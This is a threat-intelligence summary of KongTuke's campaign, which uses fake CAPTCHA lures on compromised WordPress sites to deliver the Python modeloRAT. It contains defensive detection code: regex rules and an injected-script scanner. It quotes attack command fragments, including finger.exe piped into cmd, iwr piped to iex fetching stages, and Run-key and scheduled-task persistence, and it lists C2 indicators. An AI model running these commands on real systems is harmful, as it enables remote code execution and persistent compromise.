Through the Lens of MDR: Analysis of KongTuke’s ClickFix Abuse of Compromised WordPress Sites

TrendAI Vision One™ MDR observed an active KongTuke campaign using compromised WordPress sites and fake CAPTCHA/CrashFix lures to deliver the Python-based modeloRAT, which performs reconnaissance, remote command execution, and persistent access. #KongTuke #modeloRAT

Keypoints

  • Threat actor KongTuke continues to deliver modeloRAT via compromised WordPress sites with injected JavaScript that prompts victims to run PowerShell commands through fake CAPTCHA or CrashFix-style lures.
  • Attackers abuse legitimate tools and services—PowerShell, finger.exe, Dropbox-hosted archives, portable Python distributions, and Telegram infrastructure—to evade detection and maintain C2 connectivity.
  • Initial execution includes copying and running finger.exe to pipe remote responses into cmd, decoding an in-memory ROT-obfuscated PowerShell loader, and downloading a second-stage PowerShell script to %AppData%.
  • modeloRAT (Python) enumerates host and network details, checks domain membership and installed security products, and sends structured JSON telemetry to C2 endpoints via HTTP and Telegram-backed channels.
  • Persistence is achieved through a Run registry value (monitoringservice) and a scheduled task named “SoftwareProtection” that repeatedly launches the malicious Python payload.
  • The operation uses multilayered obfuscation (reversal, Base64, zlib, Base85, AES-256, compiled bytecode/marshal) across udp.pyw and run.pyw, indicating a modular, persistent backdoor architecture.
  • TrendAI recommends hardening WordPress servers, enhancing endpoint detection and monitoring for suspicious command-line and network behavior, and raising user awareness so that users do not run commands copied from web pages.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Compromise and injection of malicious JavaScript into WordPress sites to deliver payloads (‘injected malicious JavaScript into legitimate WordPress websites’).
  • [T1204] User Execution – Social-engineering lures (fake CAPTCHA, CrashFix extension) trick users into installing extensions or running PowerShell commands (‘fake CAPTCHA page instructing the user to run a PowerShell command’).
  • [T1059.001] PowerShell – Use of Invoke-WebRequest and Invoke-Expression to download and execute subsequent stages (‘uses Invoke-WebRequest (iwr) and pipes output to iex (Invoke-Expression)’).
  • [T1218] Signed Binary Proxy Execution – Abusing legitimate finger.exe by copying it to a temp executable and piping network responses into cmd to achieve RCE (‘copy %windir%\system32\finger.exe %temp%\ct.exe …|cmd’).
  • [T1055] In-memory Execution / Process Injection – ROT-decoded PowerShell blob reconstructed and executed in memory without initial disk writes (‘executes it in memory, then executes it without initially writing to the disk’).
  • [T1105] Ingress Tool Transfer – Downloading a ZIP/portable Python distribution and additional Python scripts from Dropbox to %AppData% (‘iwr -Uri "hxxps://www[.]dropbox[.]com/…" -OutFile "$env:appdata\Winpython.zip"’).
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communications via HTTP POST to attacker IPs and connections to Telegram infrastructure (‘sends the collected data via HTTP POST to: hxxp://45.61.138[.]224/n’ and ‘HTTPS connection to 149.154.164.13 (associated with Telegram infrastructure)’).
  • [T1547.001] Registry Run Keys and Startup Folder – Persistence via a Run key entry named monitoringservice pointing to pythonw.exe and modes.py (‘HKCU\Software\Microsoft\Windows\CurrentVersion\Run … monitoringservice’).
  • [T1053.005] Scheduled Task/Job – Persistent scheduled task “SoftwareProtection” created to run the Python payload every five minutes (‘schtasks.exe /create /tn SoftwareProtection … /sc minute /mo 5’).
  • [T1082] System Information Discovery – Extracting domain membership and system details via systeminfo and other enumeration commands (‘extracts domain information from systeminfo to determine whether the host is joined to a domain’).
  • [T1057] Process Discovery – Enumerating running processes and checking for security/analysis tools before executing (‘enumerates running processes (Get-Process) and compares each process name against that list’).
  • [T1518.001] Software Discovery – Querying WMI for installed antivirus products to identify security tooling (‘Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct’).
  • [T1564] Hide Artifacts – Deleting transient script files after execution to reduce forensic evidence (‘runs it via PowerShell, and deletes it to reduce forensic evidence’).
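The techniques above all leave distinctive command lines in process-creation telemetry. The following is an added detection example written for this summary, not code from the Trend Micro report or from Trend Vision One: a handful of regex rules, each tied to one of the MITRE techniques listed, run over constructed Sysmon-style process-creation events. The event records, user names, local paths and the `example.invalid` URL are constructed placeholders; only the quoted command fragments (finger.exe copy, iwr|iex, the monitoringservice Run value, the SoftwareProtection task) come from the summary.

```python
"""Added example (not code from the Trend Micro report): a small rule set that
flags process-creation events matching the KongTuke / modeloRAT execution and
persistence chain summarized above. All events below are constructed samples."""
import re
from typing import Dict, List, Tuple

# Constructed process-creation records in a simplified Sysmon Event ID 1 shape.
# User names, local paths and the URL are placeholders, not indicators from the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c copy %windir%\system32\finger.exe %temp%\ct.exe && %temp%\ct.exe user@host|cmd"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iwr -Uri 'https://example.invalid/stage2' | iex\""},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v monitoringservice /t REG_SZ /d "C:\Users\user\AppData\Roaming\WPy64-31401\python\pythonw.exe modes.py"'},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn SoftwareProtection /tr "C:\Users\user\AppData\Roaming\run.exe" /sc minute /mo 5'},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\user\notes.txt"},
]

# Each rule: (name, MITRE technique from the summary, compiled regex over the command line).
RULES: List[Tuple[str, str, "re.Pattern[str]"]] = [
    ("finger_copied_to_temp", "T1218",
     re.compile(r"copy\s+\S*finger\.exe\s+%temp%", re.I)),
    ("finger_piped_to_cmd", "T1218",
     re.compile(r"finger\.exe.*\|\s*cmd\b", re.I)),
    ("iwr_piped_to_iex", "T1059.001",
     re.compile(r"\b(?:iwr|invoke-webrequest)\b.*\|\s*(?:iex|invoke-expression)\b", re.I)),
    ("run_key_monitoringservice", "T1547.001",
     re.compile(r"CurrentVersion\\Run\b.*\bmonitoringservice\b", re.I)),
    ("schtasks_softwareprotection", "T1053.005",
     re.compile(r'schtasks(?:\.exe)?\s.*/create\s.*/tn\s+"?SoftwareProtection\b', re.I)),
    ("pythonw_from_roaming_appdata", "T1105",
     re.compile(r"AppData\\Roaming\\.*pythonw\.exe", re.I)),
]


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule whose regex matches the event's command line."""
    cmdline = event.get("cmdline", "")
    return [name for name, _technique, pattern in RULES if pattern.search(cmdline)]


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run every rule over every event; return (event index, matched rules) for hits only."""
    hits = []
    for index, event in enumerate(events):
        matched = evaluate(event)
        if matched:
            hits.append((index, matched))
    return hits


def technique_for(rule_name: str) -> str:
    """Map a rule name back to the MITRE technique ID listed in the summary."""
    for name, technique, _pattern in RULES:
        if name == rule_name:
            return technique
    raise KeyError(rule_name)


if __name__ == "__main__":
    for index, matched in scan(SAMPLE_EVENTS):
        print(f"event {index}: {SAMPLE_EVENTS[index]['image']}")
        for rule in matched:
            print(f"  {rule} ({technique_for(rule)})")
```

The two finger.exe rules are deliberately separate: the copy-to-%temp% and the pipe-into-cmd may land in different events when the copied binary is renamed, and either on its own is worth an alert, since finger.exe has almost no legitimate use on a workstation. The Run-key and scheduled-task rules key on the exact names reported (monitoringservice, SoftwareProtection); for production use, widen them to any Run value or task whose action launches pythonw.exe from a user-writable directory.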

Indicators of Compromise

  • [Domain] Malicious injected script domains observed on compromised WordPress sites – hxxps://ainttby[.]com/6f54.js, hxxps://ctpsih[.]com/2d5h.js, and 1 more domain (foodgefy[.]com/6o0jk.js).
  • [IP Address] C2 and hosting infrastructure – 45.61.138[.]224 (C2 receiving HTTP POST), 162.33.178[.]171 (script host, AS399629), and 3 more IPs (158.247.252[.]178, 170.168.103[.]208, 149.154.164[.]13 [Telegram]).
  • [File name / Path] Downloaded and executed artifacts in %AppData% – Winpython.zip (WPy64-31401), modes.py, extentions.py, and additional files (run.pyw, udp.pyw).
  • [Registry / Scheduled Task] Persistence artifacts – HKCU\Software\Microsoft\Windows\CurrentVersion\Run -> monitoringservice (points to pythonw.exe modes.py), and scheduled task ‘SoftwareProtection’ created via schtasks.exe.
  • [URLs / Hosting] Dropbox-hosted payload delivery links used for ingress tool transfer – example Dropbox download commands shown (dropbox.com/… rp?rlkey=…&dl=1) and other Dropbox URLs used to fetch Winpython.zip and extention files.
  • [Command / Process] Abused and created executables/processes – copy of finger.exe renamed to %temp%\ct.exe used to pipe commands, pythonw.exe launched from C:\Users\…\AppData\Roaming\WPy64-31401\python\pythonw.exe, and run.exe/run.pyw under SoftwareProtectionPlatform.
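On the web-server side, the injected-script domains above are the fastest thing to check on a WordPress site suspected of compromise. The following is an added example written for this summary, not code from Trend Micro or from any WordPress project: it refangs the defanged IoC URLs, parses a page's HTML with the standard library, and reports every `<script src>` whose host (absolute or scheme-relative) matches an IoC domain. The sample page is constructed; only the three script URLs come from the indicator list.

```python
"""Added example (not code from the Trend Micro report): checks a WordPress page's
HTML for <script src> tags whose host matches the injected-script domains listed
above. The page body below is a constructed sample, not a captured site."""
from html.parser import HTMLParser
from typing import List, Set
from urllib.parse import urlparse

# Defanged script URLs from the indicator list above.
IOC_SCRIPT_URLS = [
    "hxxps://ainttby[.]com/6f54.js",
    "hxxps://ctpsih[.]com/2d5h.js",
    "hxxps://foodgefy[.]com/6o0jk.js",
]

# Constructed page: one legitimate WordPress script plus two injected tags.
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://ainttby.com/6f54.js"></script>
</head><body><p>Welcome</p>
<script async src="//ctpsih.com/2d5h.js"></script>
</body></html>"""


def refang(indicator: str) -> str:
    """Turn a defanged indicator (hxxps, [.]) back into a parseable URL."""
    return indicator.replace("hxxp", "http").replace("[.]", ".")


def ioc_hosts(iocs: List[str]) -> Set[str]:
    """Lower-cased set of hostnames extracted from the defanged IoC URLs."""
    hosts = set()
    for ioc in iocs:
        host = urlparse(refang(ioc)).hostname
        if host:
            hosts.add(host.lower())
    return hosts


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value)


def extract_script_srcs(html: str) -> List[str]:
    """Return every script src in document order, relative paths included."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    return parser.srcs


def find_injected_scripts(html: str, iocs: List[str] = IOC_SCRIPT_URLS) -> List[str]:
    """Return every script src whose host (absolute or scheme-relative) is an IoC host."""
    bad_hosts = ioc_hosts(iocs)
    hits = []
    for src in extract_script_srcs(html):
        host = urlparse(src.strip()).hostname  # None for relative paths like /wp-includes/...
        if host and host.lower() in bad_hosts:
            hits.append(src)
    return hits


if __name__ == "__main__":
    for src in find_injected_scripts(SAMPLE_PAGE):
        print("injected script tag:", src)
```

Scheme-relative sources (`//host/path`) are handled because `urlparse` treats a leading `//` as a netloc; that form is common in injected tags because it works on both http and https pages. A matching tag in rendered output is only the symptom: the injection itself usually lives in a theme file, a plugin, or a database option, so the next step is to grep the document root and the wp_options table for the same domains.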


Read more: https://www.trendmicro.com/en_us/research/26/c/kongtuke-clickfix-abuse-of-compromised-wordpress-sites.html